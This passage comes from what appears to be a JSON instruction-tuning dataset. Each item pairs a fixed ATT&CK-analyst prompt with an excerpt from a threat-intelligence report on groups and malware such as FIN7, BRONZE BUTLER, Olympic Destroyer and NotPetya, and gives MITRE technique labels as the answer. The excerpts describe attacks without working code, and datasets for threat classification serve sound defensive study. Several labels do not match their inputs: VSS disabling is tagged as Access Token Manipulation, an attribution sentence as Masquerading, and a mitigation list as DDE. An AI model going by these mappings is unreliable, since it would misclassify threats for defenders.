Finally, the usage of open-source tools does not mean Turla has stopped using its custom tools", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This appears to be an implementation of hashbusting \u2014 a method of obfuscation in which a malware sample is subtly changed on the fly so each sample has a different checksum. As a result, the SHA256 hash of each payload downloaded from the sites in question appeared to be unique. However, the SSDEEP fuzzy hash of this sample was as follows", + "output": "- T1027.005: Obfuscated Files or Information - Indicator Removal from Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "By using these methods, Kimsuky can gain login and password information and/or launch malware outside of some application allowlisting solutions", + "output": "- T1133: External Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once delivered, Egregor will perform a sequence of language checks\u00a0in a similar manner to both Maze and Sekhmet, before attempting to enumerate all connected drives. If successful, it connects to a command and control (C2) server to grab a list of directories\u00a0present on the enumerated drives to search. Any files in these directories are then extracted and sent back to the C2 server", + "output": "- T1039: Data from Network Shared Drive" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After the driver is loaded, the VSS service is disabled using the Control Service Manager. Following this, a number of additional threads are created. A thread is created to handle the system reboot. It will sleep for the time specified by a command line parameter of 35 minutes, at which point the system will be restarted by an API call to InitializeSystemShutdownExW", + "output": "- T1134: Access Token Manipulation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. CTU researchers identified an xxmm builder for xxmm (see Figure 2), which suggests that the threat actors customize the xxmm malware settings based on the target. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use the \u2018net time' command to check the local time on the target system. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. Use an advanced endpoint threat detection (AETD) solution to monitor activity on network endpoints. In particular, review network access for use of mobile USB modems on corporate systems", + "output": "- T1124: System Time Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The first of FIN7's new tools is BOOSTWRITE \u2013 an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The first layer of the FYAnti loader decrypts an embedded .NET module and executes it using the CppHostCLR technique. The .NET module is packed using \u201cConfuserEx v1.0.0\u201d and acts as yet another loader that searches for a file in the \u201cC:\\Windows\\Microsoft.NET\\\u201d directory with file sizes between 100,000 and 500,000", + "output": "- T1027.002: Obfuscated Files or Information - Software Packing\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once gaining a foothold, the threat actors use off-the-shelf tools to ensure persistence, including Remote Desktop Protocol (RDP) to maintain access. While GDPR requirements prevented us from pivoting on Registrant information, the actors reused IP space, reused a certificate, and the aforementioned domain mimicking technique allowed for some pivoting. Toolset . Once gaining a foothold on a user\u2019s system, the threat actors behind STOLEN PENCIL use Microsoft\u2019s Remote Desktop Protocol (RDP) for remote point-and-click access. This means a human is behind the keyboard interacting with a compromised system, and not using a RAT (Remote Access Trojan) with a command-and-control site acting as a proxy between the threat actor and the compromised system. A compromised or stolen certificate was used to sign several PE files used in STOLEN PENCIL for two sets of tools: - MECHANICAL Logs keystrokes to %userprofile%\\appdata\\roaming\\apach. GREASE a tool to add a Windows administrator account with a specific username/password and enable RDP, circumventing any firewall rules. defaultes/1qaz2wsx#EDC - a tool to add a Windows administrator account with a specific username/password and enable RDP, circumventing any firewall rules. Figure 5: Certificate used to sign MECHANICAL/GREASE While the threat actors did use a few tools to automate intrusions, we also found a ZIP archive of tools that demonstrate their propensity for password theft to propagate. Using a combination of stolen passwords, backdoor accounts, and a forced-open RDP service, the threat actors are likely to retain a foothold on a compromised system. Conclusion . While we were able to gain insight into the threat actor\u2019s TTPs (Tools, Techniques, & Procedures) behind STOLEN PENCIL, this is clearly just a small window into their activity", + "output": "- T1078.003: Valid Accounts - Local Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Filter the target machines: setup.bat first checks if the hostname of the machine is one of the following: PIS-APP, PIS-MOB, WSUSPROXY or PIS-DB. Download the malicious files onto the machine: the same batch file downloads a cab archive named env.cab from a remote address in the internal network: \\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab. The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. Extract and run additional tools: update.bat, which was extracted and started by setup.bat, uses the password hackemall to extract the next stages: cache.bat, msrun.bat and bcd.bat. Corrupt the boot: bcd.bat is used in order to harm the boot process", + "output": "- T1489: Service Stop\n- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The BONDUPDATER Trojan contains basic backdoor functionality, allowing threat actors to upload and download files, as well as the ability to execute commands. BONDUPDATER, like other OilRig tools, uses DNS tunneling to communicate with its C2 server", + "output": "- T1071.004: Application Layer Protocol - DNS\n- T1105: Ingress Tool Transfer\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As mentioned in our earlier technical report on Trojan.Hydraq, the back door allows the attacker to perform any of the following activities: - Adjust token privileges. Check status, control, and end processes and services. Create, modify, and delete registry subkeys. Retrieve a list of logical drives", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The actor then tested connectivity to an IP managed by the victim\u2019s service provider. Once connectivity to the service provider IP was verified, the actor established the service provider IP as a proxy for the victim\u2019s SOGU backdoor. This effectively routes SOGU malware traffic through the victim\u2019s service provider, which likely indicates a foothold on the service provider\u2019s network. The tactic also serves to mask malicious C2 and exfiltration traffic and make it appear innocuous", + "output": "- T1090.002: Proxy - External Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The malware component, test.exe, uses the Windows command \"\"cmd.exe\"\" /C whoami\u201d to verify it is running with the elevated privileges of \u201cSystem\u201d and creates persistence by creating the following scheduled task\"", + "output": "- T1033: System Owner/User Discovery\n- T1053.005: Scheduled Task/Job - Scheduled Task\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The download process is the same with the previous variant, the loader resolves the command and control server IP address using a hardcoded list of DNS servers and then downloads the corresponding file. An interesting addition, in the latest samples, is the use of an alternative command and control server IP address, in case the primary one fails. The alternative IP address is generated by applying a bitwise XOR operation to each byte of the resolved command and control IP address with the byte 0xFE. In addition, as a possible anti-behaviour method, the loader verifies that the command and control server IP address is not \u2018127.0.0.1\u2019. Both of these methods are also present in the latest Team9 backdoor variants", + "output": "- T1008: Fallback Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Audit all remote authentications from trusted networks or service providers. Detect mismatches by correlating credentials used within internal networks with those employed on external-facing systems. Log use of system administrator commands such as net, ipconfig, and ping", + "output": "- T1133: External Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Use PowerShell Constrained Language Mode as it uses IEX, Add-Type, and New-Object. 2) Lock PowerShell Execution Policy, must be set to \u201cAllSigned\u201d via GPO. 3) An allowlisting solution to prevent certain process child-parent execution hierarchies", + "output": "- T1559.002: Inter-Process Communication - Dynamic Data Exchange" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Endpoint Protection . Buckeye cyberespionage group shifts gaze from US to Hong Kong . Buckeye (also known as APT3, Gothic Panda, UPS Team, and TG-0110) is a cyberespionage group that is believed to have been operating for well over half a decade. Buckeye used a remote access Trojan (Backdoor.Pirpi) in attacks against a US organization\u2019s network in 2009. Symantec has identified additional tools used by the group, which will be discussed later. Organizations that Buckeye targeted over time, per region . Malware and tools . Buckeye uses a number of hacking tools as well as malware. Buckeye uses Backdoor.Pirpi, a remote access Trojan capable of reading, writing, and executing files and programs. As mentioned previously, Buckeye also uses a number of hacking tools, including the following: Keylogger: The keylogger is configured using the command line parameters: NetworkService, Replace, Install, Register and Unregister. RemoteCMD: This tool executes commands on remote computers, similar to the PsExec tool. On execution, the tool injects itself into lsass.exe and is triggered with the argument \u201cdig\u201d. OSinfo: OSInfo is a general purpose, system information gathering tool. It has the following command line argument help: ChromePass: A tool from NirSoft used for recovering passwords stored in the Chrome browser. This, coupled with the group\u2019s use of zero-day exploits in the past, customized tools, and the types of organizations being targeted would suggest that Buckeye is a state-sponsored cyberespionage group", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In this campaign, Palmerworm is also using stolen code-signing certificates to sign its payloads, which makes the payloads appear more legitimate and therefore more difficult for security\u00a0software to detect. Palmerworm has been publicly documented using stolen code-signing certificates in previous attack campaigns", + "output": "- T1588.003: Obtain Capabilities - Code Signing Certificates" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Monday, February 12, 2018 . Olympic Destroyer Takes Aim At Winter Olympics . This blog post is authored by Warren Mercer and Paul Rascagneres. Officials at the games confirmed some technical issues to non-critical systems and they completed recovery within around 12 hours. The destructive nature of this malware aims to render the machine unusable by deleting shadow copies, event logs and trying to use PsExec & WMI to further move through the environment. This feature explains why we discovered several samples with different sets of credentials that were collected from previously infected systems. Dropped Files . Browser Credential Stealer . Olympic Destroyer drops a browser credential stealer. SQLite is embedded in the sample: . System Credential Stealer . In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. This step is executed to ensure that file recovery is not trivial - WBAdmin can be used to recover individual files, folders and also whole drives so this would be a very convenient tool for a sysadmin to use in order to aid recovery. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"\"Disabled: Specifies that the service should not be started. Legitimate File . Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. categories . Subscribe To Our Feed . Blog Archive . - - - - - - - - - - - - \u25bc February (14) CannibalRAT targets Brazil Who Wasn\u2019t Responsible for Olympic Destroyer\"", + "output": "- T1490: Inhibit System Recovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During this process, the adversary identifies data of interest from the network of the victim. This can be anything from file and directory-listings, configuration files, manuals, email stores in the guise of OST- and PST-files, file shares with intellectual property (IP), and data scraped from memory. If the data is small enough, it is exfiltrated through the command and control channel of the Cobalt Strike beacons. However, usually the data is compressed with WinRAR, staged on another system of the victim, and from there copied to a OneDrive-account controlled by the adversary", + "output": "- T1114.001: Email Collection - Local Email Collection\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As the result of the RC4 encryption may contain binary data, the malware additionally encodes it in BASE64, to match the HTTP specification", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We attribute this campaign with high confidence to an actor named WIRTE, which is a lesser-known threat actor first publicly referenced by our colleagues at Lab52 in 2019. We further suspect, with low confidence, that the WIRTE group has relations with the Gaza Cybergang threat actor", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) QEMU Linux images. 2) Shell scripts used to launch the QEMU images. 3) Daemons used to start the shell scripts at boot and keep them running. 4) A CPU monitor shell script with an accompanying daemon that can start/stop the mining based on CPU usage and whether the Activity Monitor process is running", + "output": "- T1059.004: Command and Scripting Interpreter - Unix Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. Extract and run additional tools: update.bat, which was extracted and started by setup.bat, uses the password hackemall to extract the next stages: cache.bat, msrun.bat and bcd.bat. Corrupt the boot: bcd.bat is used in order to harm the boot process", + "output": "- T1070.001: Indicator Removal - Clear Windows Event Logs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The tool is used to hide the threat actors\u2019 tools and services. The tool\u2019s configuration was added to registry run keys on a victim\u2019s computer", + "output": "- T1112: Modify Registry\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KillDisk, along with the multipurpose, cyberespionage-related BlackEnergy, was used in cyberattacks in late December 2015 against Ukraine\u2019s energy sector as well as its banking, rail, and mining industries. The malware has since metamorphosed into a threat used for digital extortion, affecting Windows and Linux platforms", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RemoteCMD: This tool executes commands on remote computers, similar to the PsExec tool. Usage is: %s shareIp domain\u00a0[USER INFORMATION||[USER NAME AND PASSWORD]] [/run:[COMMAND", + "output": "- T1053.005: Scheduled Task/Job - Scheduled Task\n- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The new wave of Shamoon is accompanied by a .Net tool kit that spreads Shamoon Version 3 and the wiper Filerase", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After achieving access to staging targets, the threat actors installed tools to carry out operations against intended victims. On one occasion, threat actors installed the free version of FortiClient, which they presumably used as a VPN client to connect to intended target networks", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NCCIC observed multiple methods used by NotPetya to propagate across a network. The first and\u2014in most cases\u2014most effective method, uses a modified version of the Mimikatz tool to steal the user\u2019s Windows credentials. The cyber threat actor can then use the stolen credentials, along with the native Windows Management Instrumentation Command Line (WMIC) tool or the Microsoft SysInternals utility, psexec.exe, to access other systems on the network. Another method for propagation uses the EternalBlue exploit tool to target unpatched systems running a vulnerable version of SMBv1", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Volexity has identified multiple new attack campaigns being launched by OceanLotus via multiple fake websites and Facebook pages that have been set up within the last year. In addition to targeting those within Vietnam, Volexity has seen renewed targeting of OceanLotus's neighbors throughout Southeast Asia. These websites have been observed profiling users, redirecting to phishing pages, and being leveraged to distribute malware payloads for Windows and OSX. This post will focus on one of the larger campaigns where OceanLotus has leveraged multiple fake news websites to target users", + "output": "- T1585.001: Establish Accounts - Social Media Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed) to maintain access to credentials and certain permission levels within an environment (Account Manipulation [T1098]) - Steal the credentials of a specific user or service account to bypass access controls and retain access to remote systems and externally available services (Valid Accounts [T1078]) - Use the Task Scheduler to run programs at system startup or on a scheduled basis for persistence, conduct remote execution for lateral movement, gain SYSTEM privileges for privilege escalation, or run a process under the context of a specified account (Scheduled Task/Job [T1053]) - Abuse the Windows DLLs search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence (Hijack Execution Flow: DLL Search Order Hijacking [T1056.004]) - Exploit hooking to load and execute malicious code within the context of another process to mask the execution, allow access to the process\u2019s memory, and, possibly, gain elevated privileges (Input Capture: Credential API Hooking [T1574.001]) - Use remote services to persist within a victim\u2019s network (External Remote Services [T1133", + "output": "- T1053.005: Scheduled Task/Job - Scheduled Task\n- T1505.003: Server Software Component - Web Shell\n- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TA551 has distributed different families of malware, including Ursnif (Gozi/ISFB), Valak and IcedID. TA551 malspam spoofs legitimate email chains based on data retrieved from previously infected Windows hosts. This is a generic statement asking the recipient to open an attached ZIP archive using the supplied password. File names for the ZIP archives use the name of the company being spoofed in the email. For example, if the spoofed sender is someone@companyname.com, the ZIP attachment would be named companyname.zip. In 2020, we also started seeing emails with info.zip or request.zip as the attached ZIP archive names. These password-protected ZIP attachments contain a Word document with macros to install malware. File names for the extracted Word documents follow noticeable patterns that have evolved as this campaign has progressed. URLs generated by the associated Word macros also follow noticeable patterns that have also evolved as this campaign has progressed", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE 